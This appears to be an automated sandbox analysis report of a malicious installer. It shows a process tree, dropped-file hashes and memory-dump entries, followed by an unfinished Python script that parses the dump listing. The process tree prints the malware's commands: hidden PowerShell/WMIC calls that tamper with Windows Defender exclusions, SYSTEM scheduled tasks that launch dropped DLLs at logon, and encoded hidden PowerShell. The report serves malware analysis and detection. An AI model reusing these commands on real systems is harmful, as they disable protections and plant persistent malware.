        • Scheduled Task/Job: Scheduled Task
        PID:2572
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /run /I /tn "bdmBPZkQYKMDiCzlG"
        3⤵
        PID:2864
      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 492
                                                                                        3⤵
                                                                                        • Loads dropped DLL
                                                                                        • Program crash
                                                                                        PID:2472
                                                                                    • C:\Windows\Temp\PfAmACXkWBLbKqPZ\wQaztmnOsDzmFZa\IbhinZm.exe
                                                                                      C:\Windows\Temp\PfAmACXkWBLbKqPZ\wQaztmnOsDzmFZa\IbhinZm.exe 5U /WuvkdidDy 525403 /S
                                                                                      2⤵
                                                                                      • Checks computer location settings
                                                                                      • Executes dropped EXE
                                                                                      • Drops Chrome extension
                                                                                      • Drops file in System32 directory
                                                                                      • Drops file in Program Files directory
                                                                                      • Modifies data under HKEY_USERS
                                                                                      • Modifies system certificate store
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:1220
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        schtasks /DELETE /F /TN "brlogsXZdQLKJRjYtj"
                                                                                        3⤵
                                                                                          PID:2764
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                          3⤵
                                                                                            PID:1088
                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                              forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                              4⤵
                                                                                                PID:2508
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                  5⤵
                                                                                                    PID:1976
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                      6⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Drops file in System32 directory
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:2624
                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                        7⤵
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:1916
                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                  forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                                  4⤵
                                                                                                    PID:1476
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                      5⤵
                                                                                                        PID:2836
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                          6⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          • Drops file in System32 directory
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:2308
                                                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                            7⤵
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:3040
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ZDLVjxnHU\YFpaxQ.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "tRbTscEIBTcXFpe" /V1 /F
                                                                                                    3⤵
                                                                                                    • Drops file in Windows directory
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:1240
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /CREATE /TN "tRbTscEIBTcXFpe2" /F /xml "C:\Program Files (x86)\ZDLVjxnHU\friNppl.xml" /RU "SYSTEM"
                                                                                                    3⤵
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:1988
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /END /TN "tRbTscEIBTcXFpe"
                                                                                                    3⤵
                                                                                                      PID:2472
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /DELETE /F /TN "tRbTscEIBTcXFpe"
                                                                                                      3⤵
                                                                                                        PID:2412
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "UMVDLkRPlKTzVm" /F /xml "C:\Program Files (x86)\ijGSqddcuZeU2\oEsyZtI.xml" /RU "SYSTEM"
                                                                                                        3⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:1492
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "qAaqOfviiIaiI2" /F /xml "C:\ProgramData\rPjTFWmQUriHtIVB\fsQcoiA.xml" /RU "SYSTEM"
                                                                                                        3⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:1960
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "dnxSRqgonxLOXEwjj2" /F /xml "C:\Program Files (x86)\nIXneLoYhSqxVZkgocR\RHpapsr.xml" /RU "SYSTEM"
                                                                                                        3⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:2040
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "symbKzMjSaDuuUPBtNE2" /F /xml "C:\Program Files (x86)\wWtwQxeSPhIsC\BkKLGDC.xml" /RU "SYSTEM"
                                                                                                        3⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:2780
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "SQVSLJdEAqcPOSFTe" /SC once /ST 00:29:43 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\PfAmACXkWBLbKqPZ\McEluLOw\OnSrNDh.dll\",#1 /RAdidcMqu 525403" /V1 /F
                                                                                                        3⤵
                                                                                                        • Drops file in Windows directory
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:2792
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /run /I /tn "SQVSLJdEAqcPOSFTe"
                                                                                                        3⤵
                                                                                                          PID:2696
                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                          schtasks /DELETE /F /TN "bdmBPZkQYKMDiCzlG"
                                                                                                          3⤵
                                                                                                            PID:1060
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1220 -s 1576
                                                                                                            3⤵
                                                                                                            • Loads dropped DLL
                                                                                                            • Program crash
                                                                                                            PID:2708
                                                                                                        • C:\Windows\system32\rundll32.EXE
                                                                                                          C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\PfAmACXkWBLbKqPZ\McEluLOw\OnSrNDh.dll",#1 /RAdidcMqu 525403
                                                                                                          2⤵
                                                                                                            PID:2616
                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                              C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\PfAmACXkWBLbKqPZ\McEluLOw\OnSrNDh.dll",#1 /RAdidcMqu 525403
                                                                                                              3⤵
                                                                                                              • Blocklisted process makes network request
                                                                                                              • Checks BIOS information in registry
                                                                                                              • Loads dropped DLL
                                                                                                              • Drops file in System32 directory
                                                                                                              • Enumerates system info in registry
                                                                                                              • Modifies data under HKEY_USERS
                                                                                                              PID:768
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /DELETE /F /TN "SQVSLJdEAqcPOSFTe"
                                                                                                                4⤵
                                                                                                                  PID:1472
                                                                                                          • C:\Windows\system32\taskeng.exe
                                                                                                            taskeng.exe {5DB0FBA7-B769-491B-8CB1-9343CC48DFB0} S-1-5-21-3627615824-4061627003-3019543961-1000:SCFGBRBT\Admin:Interactive:[1]
                                                                                                            1⤵
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:1656
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                              2⤵
                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                              • Drops file in System32 directory
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:2832
                                                                                                              • C:\Windows\system32\gpupdate.exe
                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                3⤵
                                                                                                                  PID:2052
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                2⤵
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                • Drops file in System32 directory
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:1376
                                                                                                                • C:\Windows\system32\gpupdate.exe
                                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                  3⤵
                                                                                                                    PID:1084
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                  2⤵
                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                  • Drops file in System32 directory
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:1500
                                                                                                                  • C:\Windows\system32\gpupdate.exe
                                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                    3⤵
                                                                                                                      PID:2204
                                                                                                                • C:\Windows\system32\gpscript.exe
                                                                                                                  gpscript.exe /RefreshSystemParam
                                                                                                                  1⤵
                                                                                                                    PID:748
                                                                                                                  • C:\Windows\system32\gpscript.exe
                                                                                                                    gpscript.exe /RefreshSystemParam
                                                                                                                    1⤵
                                                                                                                      PID:944
                                                                                                                    • C:\Windows\system32\gpscript.exe
                                                                                                                      gpscript.exe /RefreshSystemParam
                                                                                                                      1⤵
                                                                                                                        PID:2092

Network

MITRE ATT&CK Enterprise v15

Downloads

• C:\Program Files (x86)\ZDLVjxnHU\friNppl.xml
  Filesize 2KB
  MD5 827e1f25a0696589b12e5777456affc5
  SHA1 8302c55b5138e046859441859798b336549d2f6f
  SHA256 15a9647ac9c084fac61e91e84d1007363998972b66f08121190bd0636b3f6ead
  SHA512 0badf305765ee89fd314609b097e51f77428ed685fc668bdbe35a6e394bbb47a1407480da15ea100e0192087e22a42aaf9d1f603c43754fc8cca77795e74da3b

• C:\Program Files (x86)\ijGSqddcuZeU2\oEsyZtI.xml
  Filesize 2KB
  MD5 0be828f11cc7a6948f3c688afc0f3d4b
  SHA1 c8ebbc84efd645f2dc9e587aa8192586409d42d6
  SHA256 ec6499fa60ae6a953ac70bb003e9d3fdb06c508786a045d72de3b19b1c8d45ca

                                                                                                                        SHA512

                                                                                                                        3273890c1bef47a25a367666047098e7d023906bef3004313737727eafac93460ac73a17d19a9c83e98d016b4dbfe533ef49abea057ebab9eaa28c345428e14d

                                                                                                                      • C:\Program Files (x86)\nIXneLoYhSqxVZkgocR\RHpapsr.xml

                                                                                                                        Filesize

                                                                                                                        2KB

                                                                                                                        MD5

                                                                                                                        321638a540afcfa9f76f73b864e48c3a

                                                                                                                        SHA1

                                                                                                                        9e75996450f393b3711867a049626fdb56a61f98

                                                                                                                        SHA256

                                                                                                                        75bf1cc9f57bb8c1c6dae639fb8197bc1597cfa84b4bf980cfd0f943ec7e0e03

                                                                                                                        SHA512

                                                                                                                        f29006880df8520a9b31804d2d6ddbfc8733870a07dbd528370c847338d1b6edec371ea8b60f34d9f2e82a6f450a5b2bfacbdcd81e6b3e80c4499baa353d6d28

                                                                                                                      • C:\Program Files (x86)\wWtwQxeSPhIsC\BkKLGDC.xml

                                                                                                                        Filesize

                                                                                                                        2KB

                                                                                                                        MD5

                                                                                                                        7fb355eaebe65b5092f3c885389ab28b

                                                                                                                        SHA1

                                                                                                                        e57653f8ec67e03ca6f24aba10cfdd6b1e432530

                                                                                                                        SHA256

                                                                                                                        d58057d3293fda47b93e44820c6da4dc86f4c26385279e11accb631dd074fde6

                                                                                                                        SHA512

                                                                                                                        ee07b3b31efcfb4666ddfe650c22887be4e2d079cae8e6e1589106ddef25fe5794f283752b2bf6b23dbc04503eca6021a8858d44af36a0164c61d8253e58e1f1

                                                                                                                      • C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

                                                                                                                        Filesize

                                                                                                                        2.0MB

                                                                                                                        MD5

                                                                                                                        d959ce7d07cce874e6685fce87932f3f

                                                                                                                        SHA1

                                                                                                                        12218baed5a7b9e6e013e0a2d28913f68de352a3

                                                                                                                        SHA256

                                                                                                                        ac137fc8f078ceb1e0aac923e18ee8cf2543d0dca00953d64eddb28fdaa1ffea

                                                                                                                        SHA512

                                                                                                                        c616833eef0062923251261d318697c39dce7a0129de31bc7436ddd0abe9c22bdbae48b630e8f1c43a271bfe836e57db4cf50cd0ae842abb14bc6a92556ce2a7

                                                                                                                      • C:\ProgramData\rPjTFWmQUriHtIVB\fsQcoiA.xml

                                                                                                                        Filesize

                                                                                                                        2KB

                                                                                                                        MD5

                                                                                                                        6ef6ef2b8716da65a81755bfb23dcf2e

                                                                                                                        SHA1

                                                                                                                        52cea912b39c4960b6640cc5669babbea583a567

                                                                                                                        SHA256

                                                                                                                        3128cb26a51e206d8bfae6f87d342af4b8f9a7554e59634403b30fd4e0eeddb8

                                                                                                                        SHA512

                                                                                                                        f385dec89db7f3f244089909b5b7f7a10a50c78f66e218ee99825e81cb670c3b18071b54211af86b9d572842e06c3062e213a598ec8ee888fd984f7cd36d9f28

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

                                                                                                                        Filesize

                                                                                                                        187B

                                                                                                                        MD5

                                                                                                                        2a1e12a4811892d95962998e184399d8

                                                                                                                        SHA1

                                                                                                                        55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                        SHA256

                                                                                                                        32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                        SHA512

                                                                                                                        bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

                                                                                                                        Filesize

                                                                                                                        136B

                                                                                                                        MD5

                                                                                                                        238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                        SHA1

                                                                                                                        0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                        SHA256

                                                                                                                        801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                        SHA512

                                                                                                                        2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

                                                                                                                        Filesize

                                                                                                                        150B

                                                                                                                        MD5

                                                                                                                        0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                        SHA1

                                                                                                                        6a51537cef82143d3d768759b21598542d683904

                                                                                                                        SHA256

                                                                                                                        0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                        SHA512

                                                                                                                        5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                        Filesize

                                                                                                                        10KB

                                                                                                                        MD5

                                                                                                                        c428fd78592db27aa6bad40570ecb3fc

                                                                                                                        SHA1

                                                                                                                        dfb8aaec3ed8eff3e48158dc0db844b1b367463e

                                                                                                                        SHA256

                                                                                                                        ae190d034f5c0f45af0b4341bf3fd47542de32b835283079b583d18229a30d87

                                                                                                                        SHA512

                                                                                                                        e9588a94d78ec42e0c5432f5092565903e7d006430a304d5fd3161f28299d0aa0561aeeda9526a19b3faa3e202bb82dd2139f027b6fd3410ffdb5b630d816384

                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                                        Filesize

                                                                                                                        7KB

                                                                                                                        MD5

                                                                                                                        3c0a58ca2f2e0f3c06956d481b43fda7

                                                                                                                        SHA1

                                                                                                                        06f478ceb7413f37efdefdc2e705bbb3b352c887

                                                                                                                        SHA256

                                                                                                                        c74a0f90be40961bbc99c4c386b5608f9d984f4c6884b28008812c329f4ea914

                                                                                                                        SHA512

                                                                                                                        b0245a56f217c3cf65d9af0e2beb5cbf11f9cdb6ecc119dc4e0676f39ff3d81b7210b983e54d3dcaacc42c374b92f6d5fee78b12613958fca3f8ef0caf4f5f6b

                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\P2LM7RQ4XPTFLCNDZ27L.temp

                                                                                                                        Filesize

                                                                                                                        7KB

                                                                                                                        MD5

                                                                                                                        2584e5c1bf1e88e8642981e0c7ec273a

                                                                                                                        SHA1

                                                                                                                        82da2de875505ab8ffcfef9755f3ce60426a3c17

                                                                                                                        SHA256

                                                                                                                        663ed37d292c607533acab43d9627845ae875093762ff79117f5f88977818052

                                                                                                                        SHA512

                                                                                                                        8d85535e520be5b061f0733a205b8c661285bc98a98b8741bce6b3aa4015e6bdf8e80dcb142e72bb53eb9b942b7914fbb18e20933d0fcdf951b31e222e44db3c

                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lf4jobx9.default-release\prefs.js

                                                                                                                        Filesize

                                                                                                                        6KB

                                                                                                                        MD5

                                                                                                                        7e7e9f5cbbebdd6fc57d166d528a4e27

                                                                                                                        SHA1

                                                                                                                        4fde31a1f2c573808183c05ccbaa8343053d23bf

                                                                                                                        SHA256

                                                                                                                        18a8aedcfcb19cc30750b6f0339aa86d27f3bd3917bf9b185ea152a78eb06d62

                                                                                                                        SHA512

                                                                                                                        3460f808e0151720e59bff8d5a4a8219892d4fd4704a43754e06165f8111004943534874221751b316abaca11ac397ff4b5bfa6199e735fcb3b7f9be9259aefa

                                                                                                                      • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

                                                                                                                        Filesize

                                                                                                                        70KB

                                                                                                                        MD5

                                                                                                                        49aebf8cbd62d92ac215b2923fb1b9f5

                                                                                                                        SHA1

                                                                                                                        1723be06719828dda65ad804298d0431f6aff976

                                                                                                                        SHA256

                                                                                                                        b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                                                                                                                        SHA512

                                                                                                                        bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                                                                                                                      • C:\Windows\Temp\PfAmACXkWBLbKqPZ\McEluLOw\OnSrNDh.dll

                                                                                                                        Filesize

                                                                                                                        6.4MB

                                                                                                                        MD5

                                                                                                                        0e0f3c296e7c61bdd612a4256769579e

                                                                                                                        SHA1

                                                                                                                        bc2ea1335b7c818a9dab5c12ded16079613282cc

                                                                                                                        SHA256

                                                                                                                        5b0426dc799b941884ad8e266ebaeca07ffce34faf457880d76ee82c54784908

                                                                                                                        SHA512

                                                                                                                        766c21db290c413fe260f7ebd3d41907ccb9bf1a3a909ebc622b10735c296a481ca2bf67883ca01588df3aebe75db1452b0b689872ed8e8e13fcb2c2f3d7b67c

                                                                                                                      • C:\Windows\Temp\PfAmACXkWBLbKqPZ\OQnQKElp\pniHQwrvPVzKEiGL.wsf

                                                                                                                        Filesize

                                                                                                                        9KB

                                                                                                                        MD5

                                                                                                                        dd7d7765fbb6a1b2a1244bc69686b7d8

                                                                                                                        SHA1

                                                                                                                        527ff1fa7a6b89c73a34efaedcd74d548d447247

                                                                                                                        SHA256

                                                                                                                        75b275235dba710d8bc7a162cb4f04d6b05adaa1379aef7786948db06530d358

                                                                                                                        SHA512

                                                                                                                        69d3ab5e98eb7f1591247c470e0bd7dba7e6c85f183dadbffd6f1b677122420e159f4fa9ed9a81e0efe39450e0abfd6bf63fb77fba3320f5e9bd03f3279dc0c6

                                                                                                                      • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                                                                                        Filesize

                                                                                                                        5KB

                                                                                                                        MD5

                                                                                                                        7714c088cfc6650b0459a2f393675df0

                                                                                                                        SHA1

                                                                                                                        4a0f701ec64b31c9aa6e076bb1ffb0052082a08b

                                                                                                                        SHA256

                                                                                                                        1e0322e470ff44d3efae13b7f1007ea1d3cdcee1301e1accf60ebc0688e3b56d

                                                                                                                        SHA512

                                                                                                                        7f385d7c59609cfbbb9b13d6fc5524cfd474b9dc0e3ec540af1759c251ae994ea0565cff2fa33f0d61d292805175b78b6d51f7c9a3da1a6fe785fd5ae8ca2ced

                                                                                                                      • \Users\Admin\AppData\Local\Temp\7zS1A83.tmp\Install.exe

                                                                                                                        Filesize

                                                                                                                        6.4MB

                                                                                                                        MD5

                                                                                                                        c52dee58e1654722e85bc9d2cc9318a1

                                                                                                                        SHA1

                                                                                                                        6aa1df96f0b154e17f898fd32844fa4e7010e049

                                                                                                                        SHA256

                                                                                                                        4041f4481be3085fe58bb53819ca274719f7210f76a091ef846bd4434865bad2

                                                                                                                        SHA512

                                                                                                                        fc717c772485c49c4ab89d322831021c1d2530628cb70de72453e5ecf120de3a325b58f0437a92a80968793042c9db64125a4593570497d5642ef16999e4a93c

• \Users\Admin\AppData\Local\Temp\7zS1EE6.tmp\Install.exe
  Filesize: 6.7MB
  MD5: c620de5bb5cd064dae66dfa434246e55
  SHA1: 7e539b964609bad8a802a65a7d33126123ec691d
  SHA256: c32807f003f32225bac2478e900b302e3b512b4de7dd9e246a892b01378f97cc
  SHA512: 66834633d63a04e2e738b6ec7e4cb0d0ad1e88ffeca35a43a287b6c505023e1101b69d344898511b259c3742f767a1fe485bb1559e3bebb41c8d84ec4f72f667

• memory/768-371-0x0000000001320000-0x00000000019BF000-memory.dmp
  Filesize: 6.6MB

• memory/1220-82-0x0000000000C30000-0x00000000012DF000-memory.dmp
  Filesize: 6.7MB

• memory/1220-338-0x0000000002BF0000-0x0000000002C7A000-memory.dmp
  Filesize: 552KB

• memory/1220-83-0x0000000010000000-0x000000001069F000-memory.dmp
  Filesize: 6.6MB

• memory/1220-95-0x0000000001FF0000-0x0000000002075000-memory.dmp
  Filesize: 532KB

• memory/1220-383-0x0000000000C30000-0x00000000012DF000-memory.dmp
  Filesize: 6.7MB

• memory/1220-128-0x0000000001E30000-0x0000000001E9E000-memory.dmp
  Filesize: 440KB

• memory/1220-348-0x00000000039A0000-0x0000000003A75000-memory.dmp
  Filesize: 852KB

• memory/1376-61-0x0000000002070000-0x0000000002078000-memory.dmp
  Filesize: 32KB

• memory/1376-60-0x000000001B560000-0x000000001B842000-memory.dmp
  Filesize: 2.9MB

• memory/2032-39-0x0000000000930000-0x0000000000FDF000-memory.dmp
  Filesize: 6.7MB

• memory/2032-40-0x0000000010000000-0x000000001069F000-memory.dmp
  Filesize: 6.6MB

• memory/2032-81-0x0000000000930000-0x0000000000FDF000-memory.dmp
  Filesize: 6.7MB

• memory/2032-62-0x0000000000930000-0x0000000000FDF000-memory.dmp
  Filesize: 6.7MB

• memory/2236-22-0x0000000002400000-0x0000000002AAF000-memory.dmp
  Filesize: 6.7MB

• memory/2744-24-0x00000000013F0000-0x0000000001A9F000-memory.dmp
  Filesize: 6.7MB

• memory/2744-23-0x0000000000D40000-0x00000000013EF000-memory.dmp
  Filesize: 6.7MB

• memory/2744-27-0x0000000010000000-0x000000001069F000-memory.dmp
  Filesize: 6.6MB

• memory/2744-25-0x00000000013F0000-0x0000000001A9F000-memory.dmp
  Filesize: 6.7MB

• memory/2744-26-0x00000000013F0000-0x0000000001A9F000-memory.dmp
  Filesize: 6.7MB

• memory/2744-35-0x0000000000D40000-0x00000000013EF000-memory.dmp
  Filesize: 6.7MB

• memory/2744-36-0x00000000013F0000-0x0000000001A9F000-memory.dmp
  Filesize: 6.7MB

• memory/2832-50-0x000000001B5E0000-0x000000001B8C2000-memory.dmp
  Filesize: 2.9MB

• memory/2832-51-0x0000000001D90000-0x0000000001D98000-memory.dmp
  Filesize: 32KB
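The dump names above encode the process id and the virtual address range each region was captured from, so a short script can turn the listing into something an analyst can act on. The following is an added example and not part of the tria.ge report or its tooling: it assumes the name layout memory/<pid>-<index>-<start>-<end>-memory.dmp inferred from the entries above (the middle number is treated as an opaque index), recomputes each region's size from its addresses, checks that against the Filesize the report shows, flags the same address range turning up in several processes, and verifies a dropped file's digests against listed values. The sample entries are copied from this section; the digest check is exercised on a constructed empty input because the dropped file itself is not on the page.

```python
import hashlib
import re
from collections import defaultdict

# Constructed sample: a subset of the memory dump names listed in this report,
# with the Filesize the report shows beside each.
SAMPLE_REPORTED = {
    "memory/768-371-0x0000000001320000-0x00000000019BF000-memory.dmp": "6.6MB",
    "memory/1220-82-0x0000000000C30000-0x00000000012DF000-memory.dmp": "6.7MB",
    "memory/1220-83-0x0000000010000000-0x000000001069F000-memory.dmp": "6.6MB",
    "memory/1220-338-0x0000000002BF0000-0x0000000002C7A000-memory.dmp": "552KB",
    "memory/2032-40-0x0000000010000000-0x000000001069F000-memory.dmp": "6.6MB",
    "memory/2744-27-0x0000000010000000-0x000000001069F000-memory.dmp": "6.6MB",
    "memory/1376-60-0x000000001B560000-0x000000001B842000-memory.dmp": "2.9MB",
    "memory/2832-51-0x0000000001D90000-0x0000000001D98000-memory.dmp": "32KB",
}
DUMP_NAMES = list(SAMPLE_REPORTED)

# Assumed layout: memory/<pid>-<index>-0x<start>-0x<end>-memory.dmp (inferred from the listing).
DUMP_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")


def parse_dump_name(name):
    """Split a dump name into pid, index and the [start, end) address range it covers."""
    m = DUMP_RE.match(name)
    if not m:
        raise ValueError(f"not a memory dump name in the assumed layout: {name}")
    pid, idx, start, end = m.groups()
    start, end = int(start, 16), int(end, 16)
    if end <= start:
        raise ValueError(f"end address does not follow start address: {name}")
    return {"pid": int(pid), "index": int(idx), "start": start, "end": end, "size": end - start}


def human_size(n):
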